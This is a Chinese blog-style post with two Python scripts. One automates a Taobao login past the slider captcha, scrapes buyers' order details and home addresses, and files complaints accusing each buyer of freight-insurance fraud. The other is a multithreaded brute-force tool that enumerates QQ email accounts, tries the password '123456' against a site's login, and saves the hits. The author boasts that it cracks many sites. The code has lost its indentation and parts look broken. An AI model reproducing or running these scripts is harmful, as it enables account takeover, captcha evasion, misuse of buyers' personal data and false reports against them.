爬虫之类的东西:
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from lxml import etree
print('请输入账号:')
username=input()
print('请输入密码:')
password=input()
driver=webdriver.Chrome(r'E:pythonchromedriver.exe')
driver.maximize_window()
driver.get('https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb'
)
js="""
document.getElementById('TPL_username_1').value='{0}';
document.getElementById('password-label').value='{1}';
document.getElementById('J_SubmitStatic').click()
""".format(username,password)
driver.execute_script(js)
try:
element=driver.find_elements_by_id('nc_1_scale_text')
ActionChains(driver).drag_and_drop_by_offset(element,400,0).perform()
time.sleep(2)
driver.execute_script(js)
except:
print('没有开挂')
pass
time.sleep(3)
print('开始开挂')
driver.switch_to.frame(0)
try:
driver.find_element_by_id('J_GetCode').click()
print('请输入手机验证码')
x=input()
driver.find_element_by_id('J_Phone_Checkcode').send_keys(x)
driver.find_element_by_id('submitBtn').click()
except Exception as e:
print(e)
driver.execute_script('window.stop()')
time.sleep(3)
driver.refresh()
try:
WebDriverWait(driver,15).until(EC.presence_of_all_elements_located((By.ID,'page')))
except:
print('over')
driver.execute_script("window.stop()")
html=driver.page_source
selector=etree.HTML(html)
list1=selector.xpath('//div[contains(@class,"item-mod__trade-order")]')
try:
for i in list1:
order_id = i.xpath('table[1]/tbody/tr/td[1]/label/span[3]/text()')[0] # 订单号
order_time = i.xpath('table[1]/tbody/tr/td[1]/label/span[6]/text()')[0] # 下单时间
price = i.xpath('table[2]/tbody/tr/td[2]/div/p/span[2]/text()')[0] # 价格
all_price = i.xpath('table[2]/tbody/tr/td[7]/div/div[1]/p/strong/span[2]/text()')[0] # 总价
saler_title = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0] # 商品名
name = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0] # 买家账户名
url = i.xpath('table[2]/tbody/tr/td[6]/div/div/p[1]/a/@href')[0] # 商品详情url
url = 'https:' + url
driver.get(url)
time.sleep(3)
driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/ul/li[2]/a').click()
address=driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/div/div[2]/div/div/div[1]/div/span[2]/span').text
print(order_id,order_time,price,all_price,saler_title,name,address)
### 进入guimi进行操作
driver.get('http://guimi.taobao.com')
time.sleep(3)
driver.find_element_by_xpath('/html/body/div[3]/div/div/a[2]').click()
driver.find_element_by_xpath('//*[@id="J_Portal"]/div/div[1]/div[2]/a[1]').click()
time.sleep(3)
driver.find_element_by_id('order.0').send_keys(order_id)
driver.find_element_by_xpath(
'//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div/button[4]').click()
time.sleep(1)
driver.find_element_by_xpath(
'//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div[2]/button').click()
time.sleep(1)
target = driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[3]/div[3]/div/div[3]/textarea')
driver.execute_script("arguments[0].scrollIntoView();", target)
target.send_keys('骗运费险的')
driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[4]/button').click()
except Exception as e:
print('出错拉'+e)
finally:
driver.quit()
利用selenium模块,通过模拟的chrome浏览器自动登陆淘宝并移动滑块
又由于想看老师的爬虫实战文章,被迫去网上寻找暴力破解密码的方式,找了很久终于找到了一家靠谱的——https://blog.csdn.net/dwx1005526886/article/details/80642072
import hashlib
import json
import random
import socket
import threading
import time
from threading import Lock
import requests
user_num_low = 111111111
user_num_max = 9999999999
user_nbr = user_num_low
mutex=Lock()
#构造用户邮箱
def get_user_nbr():
mutex.acquire(3)
global user_nbr
user_name = '%s%s' % (str(user_nbr), '@qq.com')
user_nbr = user_nbr + 1
mutex.release()
return user_name
def user_end_judge():
mutex.acquire(3)
result = False
if user_nbr > user_num_max :
result = True
else:
result = False
mutex.release()
return result
def get_curr_user():
mutex.acquire(3)
global user_nbr
user_name = '%s%s' % (str(user_nbr), '@qq.com')
mutex.release()
return user_name
#
# 构造用于判断密码邮箱是否存在
user_agent = [
'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)',
'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'
]
def save_pwd(user, pwd,desc):
with open("resut.txt","a+") as f:
f.write('user:'+ user + ' pwd:' + pwd + " desc:" + desc + '
')
def user_test(username,password):
resp = ""
result = ""
url = "http://www.k*.htm"
pwd = password
user= username
md = hashlib.md5()
md.update(pwd)
password = md.hexdigest()
data = {'email':username,'password':password}
# 设置网页编码格式,解码获取到的中文字符
encoding = "gb18030"
# 构造http请求头,设置user-agent
header = {
"User-Agent": random.choice(user_agent),
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With':'XMLHttpRequest'
}
try:
requests.adapters.DEFAULT_RETRIES = 5
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.ReadTimeout:
print("1")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.Timeout:
print("2")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.ConnectionError:
print("3")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except socket.error:
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except BaseException as e:
print(e)
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
resp.keep_alive = False
#print(resp.content)
try:
result = resp.content
json = resp.json()
print('邮箱:%s ,result:%s
' % (username,result))
if (json['message'].find('不存在') > -1):
#print('邮箱:%s 为空' % username )
return False
else:
print('邮箱: %s 存在' % username)
save_pwd(username, password, json['message'])
return True
except BaseException as e:
print("发送错误 e: %s result:%s response code:%d" % (e, result, resp.status_code ))
# 好了,我们获取到邮箱之后,就是要判断密码是否正确了,由于大部分人网站登陆,还是使用弱密码,我们可以到网上找一下相关的字典库,就可以直接破解了。
#
# 判断密码是否正确,我们只需要在判断邮箱存在之后,再加一个判断即可。
if(json['message'].find('错误') > -1):
print("邮箱: %s 密码: %s ,密码错误!" % (username,pwd))
return False
else:
print('邮箱: %s 密码: %s ,登陆成功!' % (username, pwd))
# 由于用户和密码验证较多,单一线程工作需要较长的时间,因此我们需要用上多线程,缩短密码破解时间。
def thread_bru(): # 破解子线程函数
#while not user_end_judge():pwd_queue.empty()
while not user_end_judge():
try:
pwd = '123456'
user = get_user_nbr()
#print pwd_test
#if user_test(user, pwd_test):
if user_test(user, pwd):
result = pwd
print ('破解 %s 成功,密码为: %s' % (user, pwd))
break
except BaseException as e:
print("破解子线程错误: %s" % e)
def brute(threads, pwd_queue=None):
for i in range(threads):
t = threading.Thread(target=thread_bru)
t.start()
print('破解线程-->%s 启动' % t.ident)
while (not user_end_judge()): # 剩余口令集判断
print('
进度: 当前值 %d' % pwd_queue.qsize())
time.sleep(2)
#print('
破解完毕')
if __name__ == "__main__":
brute(150)
运行之后发现并不能破解博客园的密码,不过很多其他网站的密码就可以被破解